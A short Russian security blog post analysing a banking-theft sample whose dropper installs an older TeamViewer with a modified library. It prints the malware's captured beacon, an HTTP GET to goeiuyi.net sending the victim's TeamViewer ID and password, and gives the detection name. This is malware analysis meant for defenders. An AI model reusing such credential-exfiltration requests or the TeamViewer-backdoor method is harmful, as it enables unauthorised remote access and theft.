TeamViewer, как компонент бэкдора

15 января, 2011 3039

Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.

GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1

User-Agent: x3

Host: goeiuyi.net

Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD ( VT).

Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

MAX

[ confession.log ]

Не спрашивайте, почему
мы в MAX

Мы и сами не гордимся. Но раз уж вы здесь —